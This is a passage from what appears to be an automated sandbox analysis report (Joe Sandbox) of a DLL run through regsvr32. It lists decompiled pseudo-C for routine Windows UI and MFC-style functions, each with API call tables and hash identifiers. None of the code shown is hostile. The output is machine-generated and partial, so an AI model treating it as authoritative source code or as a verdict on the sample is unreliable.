                                                                        				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
                                                                        					wsprintfA( &_v24, 0x1003cc28, _a12);
                                                                        					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
                                                                        				} else {
                                                                        					_t32 = E10035959(__ecx, _a4);
                                                                        					if(_t32 != 0) {
                                                                        						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
                                                                        						RegCloseKey(_t32);
                                                                        						_t19 = 0 | _t22 == 0x00000000;
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(_t19, _v8);
                                                                        			}










                                                                        APIs
                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002B4B3
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?), ref: 1002B4BC
                                                                        • wsprintfA.USER32 ref: 1002B4D8
                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B4EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1902064621-0
                                                                        • Opcode ID: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                        • Instruction ID: 9a6bc9ffc77bb201adb5d4a8a8e7071db867b7f7a5a0f8b8952f6efe61c2a51a
                                                                        • Opcode Fuzzy Hash: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                        • Instruction Fuzzy Hash: A001403250161AEFDB02EFA5CD45E9E3BB8FF44754F044415FA04EB152DB71DA118B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10031D85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v268;
                                                                        				int _v272;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t14;
                                                                        				int _t24;
                                                                        				intOrPtr* _t30;
                                                                        				void* _t33;
                                                                        
                                                                        				_t14 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t14;
                                                                        				E100220EE(_t33, SetActiveWindow( *(__ecx + 0x1c)));
                                                                        				_t24 = 0;
                                                                        				_v272 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
                                                                        				_t30 =  *((intOrPtr*)(E100373B5() + 4));
                                                                        				if(_v272 > 0) {
                                                                        					do {
                                                                        						DragQueryFileA(_a4, _t24,  &_v268, 0x104);
                                                                        						_t18 =  *((intOrPtr*)( *_t30 + 0x88))( &_v268);
                                                                        						_t24 = _t24 + 1;
                                                                        					} while (_t24 < _v272);
                                                                        				}
                                                                        				DragFinish(_a4);
                                                                        				return E100117AE(_t18, _v8);
                                                                        			}












                                                                        APIs
                                                                        • SetActiveWindow.USER32(?), ref: 10031D9C
                                                                        • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10031DB7
                                                                        • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 10031DDF
                                                                        • DragFinish.SHELL32(?), ref: 10031DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                        • String ID:
                                                                        • API String ID: 892977027-0
                                                                        • Opcode ID: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                        • Instruction ID: f3efa9f330312ec6ab61e1b0fbe20e019f1dfd30d235b1af0ecd9192f479495c
                                                                        • Opcode Fuzzy Hash: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
                                                                        • Instruction Fuzzy Hash: A2016975900228AFDB11DF64CC84DE97BB8EF49354F0081AAF5859B151CA70AE81CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100368F3(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                                                                        				signed short _t21;
                                                                        				void* _t37;
                                                                        
                                                                        				_t37 = __ecx;
                                                                        				if(IsWindow( *(__ecx + 0x1c)) == 0) {
                                                                        					 *(_t37 + 0xa8) = _a4;
                                                                        					 *(_t37 + 0xac) = _a8;
                                                                        					 *(_t37 + 0xa0) = _a12;
                                                                        					_t21 = _a16;
                                                                        					 *(_t37 + 0xa4) = _t21;
                                                                        					return _t21;
                                                                        				}
                                                                        				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                                                        				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                                                                        				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
                                                                        			}






                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$InvalidateRectWindow
                                                                        • String ID:
                                                                        • API String ID: 3225880595-0
                                                                        • Opcode ID: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                        • Instruction ID: 4b04fdd573aa0d80c43ff6d8227c2b4f41099026dca325be7ad292e47659670a
                                                                        • Opcode Fuzzy Hash: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
                                                                        • Instruction Fuzzy Hash: 7E015E70200718AFE7218F19DC45FAABBF8EF45751F10842AFD95DA190D6B0F850DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E10036FD8(short* _a4) {
                                                                        				char* _v0;
                                                                        				int _v8;
                                                                        				char* _v16;
                                                                        				int _t6;
                                                                        				char* _t7;
                                                                        				short* _t11;
                                                                        				void* _t12;
                                                                        				void* _t16;
                                                                        				int _t17;
                                                                        
                                                                        				_t11 = _a4;
                                                                        				if(_t11 != 0) {
                                                                        					__imp__#7(_t11, _t12, _t16);
                                                                        					_t17 = _t6;
                                                                        					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
                                                                        					_v0 = _t7;
                                                                        					__imp__#150(0, _t7);
                                                                        					_v16 = _t7;
                                                                        					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
                                                                        					return _v16;
                                                                        				}
                                                                        				return 0;
                                                                        			}













                                                                        APIs
                                                                        • SysStringLen.OLEAUT32(?), ref: 10036FEC
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10039361,00000000), ref: 10037002
                                                                        • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1003700A
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,10039361,00000000), ref: 1003701F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Byte$CharMultiStringWide$Alloc
                                                                        • String ID:
                                                                        • API String ID: 3384502665-0
                                                                        • Opcode ID: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                        • Instruction ID: 594c1e5c48785cf97723a890a7a01ae096917330bd715e74928d8e18aa0a9d1e
                                                                        • Opcode Fuzzy Hash: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
                                                                        • Instruction Fuzzy Hash: 98F030721062387F92219B679C88CABBFDCFE8B2A5B014919F548C2101C2259901CBF1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10036B96(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				char _v16;
                                                                        				int _t12;
                                                                        				signed int _t16;
                                                                        				int _t18;
                                                                        				intOrPtr _t19;
                                                                        				void* _t24;
                                                                        				intOrPtr* _t27;
                                                                        
                                                                        				_t19 = _a4;
                                                                        				_t27 = __ecx;
                                                                        				E1002F372(__ecx, _t19, _a8);
                                                                        				_t12 = E100202AB(__ecx);
                                                                        				if((_t12 & 0x00000001) != 0) {
                                                                        					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
                                                                        					if(_t12 == 0) {
                                                                        						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
                                                                        						_t16 = GetSystemMetrics(5);
                                                                        						_t18 = GetSystemMetrics(2);
                                                                        						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
                                                                        						return _t18;
                                                                        					}
                                                                        				}
                                                                        				return _t12;
                                                                        			}











                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • GetParent.USER32(?), ref: 10036BBB
                                                                        • IsZoomed.USER32(00000000), ref: 10036BC2
                                                                        • GetSystemMetrics.USER32 ref: 10036BEA
                                                                        • GetSystemMetrics.USER32 ref: 10036BF8
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MetricsSystem$LongParentWindowZoomed
                                                                        • String ID:
                                                                        • API String ID: 3909876373-0
                                                                        • Opcode ID: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                        • Instruction ID: 7d4475de74911b0f59ada56c103e3f3b6aae8d9b3b29eeb5a8f877c48aa9be1b
                                                                        • Opcode Fuzzy Hash: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
                                                                        • Instruction Fuzzy Hash: 3801A736A00214AFDB11ABB9DC49F59BBA8EF44740F018119FA45EB191D670B904CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 54%
                                                                        			E1000BFC5(intOrPtr _a4, RECT* _a8, int _a12) {
                                                                        				struct tagRECT _v20;
                                                                        				intOrPtr _t28;
                                                                        
                                                                        				_t28 = _a4;
                                                                        				if(_a8 != 0) {
                                                                        					IntersectRect( &_v20, _a8, _t28 - 0x9c);
                                                                        					EqualRect( &_v20, _a8);
                                                                        				} else {
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        				}
                                                                        				if(IsRectEmpty( &_v20) == 0) {
                                                                        					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
                                                                        				}
                                                                        				return 0;
                                                                        			}






                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                        • String ID:
                                                                        • API String ID: 3354205298-0
                                                                        • Opcode ID: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                        • Instruction ID: 1e794ae20577572ca79bd181089135021f598cd57710f0e7593056f93d140995
                                                                        • Opcode Fuzzy Hash: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
                                                                        • Instruction Fuzzy Hash: 1601E57290022EEFEF01DFA5CC88EAAB7ADFB09254F018865E914DB115D231E5198B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100214B2(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
                                                                        				long _v12;
                                                                        				void _v16;
                                                                        				intOrPtr _t12;
                                                                        				long _t16;
                                                                        
                                                                        				if(_a4 == 0 || _a16 == 0) {
                                                                        					L10:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t12 = _a12;
                                                                        					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029A8E(_a8, _t12) == 0) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						GetObjectA(_a16, 0xc,  &_v16);
                                                                        						SetBkColor(_a4, _v12);
                                                                        						_t16 = _a20;
                                                                        						if(_t16 == 0xffffffff) {
                                                                        							_t16 = GetSysColor(8);
                                                                        						}
                                                                        						SetTextColor(_a4, _t16);
                                                                        						return 1;
                                                                        					}
                                                                        				}
                                                                        			}








                                                                        APIs
                                                                        • GetObjectA.GDI32(00000000,0000000C,?), ref: 100214F0
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 100214FC
                                                                        • GetSysColor.USER32(00000008), ref: 1002150C
                                                                        • SetTextColor.GDI32(00000000,?), ref: 10021516
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Color$LongObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2871169696-0
                                                                        • Opcode ID: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                        • Instruction ID: 07a055e2fde14eb44e4b892d4051d3cd351fecf6f4b2367e44398545aae672e6
                                                                        • Opcode Fuzzy Hash: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                        • Instruction Fuzzy Hash: 0301283A900529EBEB429FA0EC85AEB3BA4EB55291F908560FD13C40A1C730CD90DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E1002095F(void* __ecx) {
                                                                        				int _t26;
                                                                        				int _t28;
                                                                        				void* _t41;
                                                                        
                                                                        				E10011BF0(0x1003a4d8, _t41);
                                                                        				_push(__ecx);
                                                                        				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
                                                                        					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
                                                                        					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                        					_push(_t41 - 0x10);
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
                                                                        					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
                                                                        					_t26 = lstrlenA( *(_t41 + 8));
                                                                        					E100014B0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
                                                                        					_t28 = _t26;
                                                                        				} else {
                                                                        					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                                                                        				return _t28;
                                                                        			}







                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10020964
                                                                        • GetWindowTextA.USER32 ref: 1002097C
                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,1002CC3A,?,00000104,?), ref: 100209B2
                                                                        • lstrlenA.KERNEL32(?,?,?,1002CC3A,?,00000104,?), ref: 100209BB
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3022380644-0
                                                                        • Opcode ID: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                        • Instruction ID: 9a5806592f70ea17751b7fdaa6094fb832eb62a9ddc39452fd7da2019fb28030
                                                                        • Opcode Fuzzy Hash: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                        • Instruction Fuzzy Hash: 75019E36900129EFDB05DFA4CC48BAEBBB2FF48314F00C619F512AB262CB719950DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1001B66F(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
                                                                        				void* _t12;
                                                                        				void* _t18;
                                                                        				intOrPtr* _t20;
                                                                        				void* _t21;
                                                                        				void* _t22;
                                                                        
                                                                        				_t20 = _a4;
                                                                        				_t19 = _a8;
                                                                        				_t12 = E1001B64E( *_t20,  *_a8, _t20);
                                                                        				_t22 = _t21 + 0xc;
                                                                        				if(_t12 != 0) {
                                                                        					_t3 = _t20 + 4; // 0x4
                                                                        					_t18 = E1001B64E( *_t3, 1, _t3);
                                                                        					_t22 = _t22 + 0xc;
                                                                        					if(_t18 != 0) {
                                                                        						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
                                                                        					}
                                                                        				}
                                                                        				_t6 = _t20 + 4; // 0x4
                                                                        				if(E1001B64E( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
                                                                        					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
                                                                        				}
                                                                        				_t10 = _t20 + 8; // 0x8
                                                                        				return E1001B64E( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
                                                                        			}









                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ___addl
                                                                        • String ID:
                                                                        • API String ID: 2260456530-0
                                                                        • Opcode ID: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                        • Instruction ID: 1cba6355bd62d8335d9ad848ad702df172e9c7a68b0d5ea6ff045fc298979a71
                                                                        • Opcode Fuzzy Hash: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                        • Instruction Fuzzy Hash: 37F06D7A800A02EFDA548B52DC02EA6B7E9FF65240B004425FD598A031EB32E8A9CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10029B23(void* __esi, struct HWND__* _a4, CHAR* _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v264;
                                                                        				intOrPtr _t10;
                                                                        				int _t20;
                                                                        
                                                                        				_t10 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t10;
                                                                        				_t20 = lstrlenA(_a8);
                                                                        				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
                                                                        					_t13 = SetWindowTextA(_a4, _a8);
                                                                        				}
                                                                        				return E100117AE(_t13, _v8);
                                                                        			}








                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: TextWindow$lstrcmplstrlen
                                                                        • String ID:
                                                                        • API String ID: 330964273-0
                                                                        • Opcode ID: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                        • Instruction ID: 93620f556a2fd5ec9caf7d88bc5fd11bb860ddfd3ca1ea698490334ddcd31a8c
                                                                        • Opcode Fuzzy Hash: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                        • Instruction Fuzzy Hash: 42F04F7690002CAFDF129FA0DD84DDDBBB9EB04380F008111F946DA120D730DE908B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100308EB(void* __ecx, void* __eflags) {
                                                                        				signed int _t8;
                                                                        				int _t9;
                                                                        				void* _t11;
                                                                        				void* _t12;
                                                                        				signed int* _t13;
                                                                        				void* _t14;
                                                                        
                                                                        				_t12 = __ecx;
                                                                        				E10030582(__ecx, __eflags, 1);
                                                                        				ReleaseCapture();
                                                                        				_t11 = E100220EE(_t14, GetDesktopWindow());
                                                                        				LockWindowUpdate(0);
                                                                        				_t13 = _t12 + 0x84;
                                                                        				_t8 =  *_t13;
                                                                        				if(_t8 != 0) {
                                                                        					_t9 = ReleaseDC( *(_t11 + 0x1c),  *(_t8 + 4));
                                                                        					 *_t13 =  *_t13 & 0x00000000;
                                                                        					return _t9;
                                                                        				}
                                                                        				return _t8;
                                                                        			}










                                                                        APIs
                                                                          • Part of subcall function 10030582: GetStockObject.GDI32(00000000), ref: 10030598
                                                                          • Part of subcall function 10030582: InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                        • ReleaseCapture.USER32(?,?,1003093E), ref: 100308F6
                                                                        • GetDesktopWindow.USER32 ref: 100308FC
                                                                        • LockWindowUpdate.USER32(00000000,00000000,?,?,1003093E), ref: 1003090C
                                                                        • ReleaseDC.USER32 ref: 10030924
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                        • String ID:
                                                                        • API String ID: 1260764132-0
                                                                        • Opcode ID: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                        • Instruction ID: cc833fa3e0bd0d4d25e579e7f05375a90551c712b7101b0f89079a167d1ea1eb
                                                                        • Opcode Fuzzy Hash: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                        • Instruction Fuzzy Hash: F2E04837500224AFE7225F65DD5DF457A64EF40752F158424F541DE0A3CA75D8D1CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E100128A7(void* __ebx, void* __edi, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				char _v21;
                                                                        				signed char _v22;
                                                                        				struct _cpinfo _v28;
                                                                        				char _v284;
                                                                        				char _v540;
                                                                        				char _v796;
                                                                        				char _v1308;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t42;
                                                                        				signed int _t45;
                                                                        				char _t47;
                                                                        				signed char _t48;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
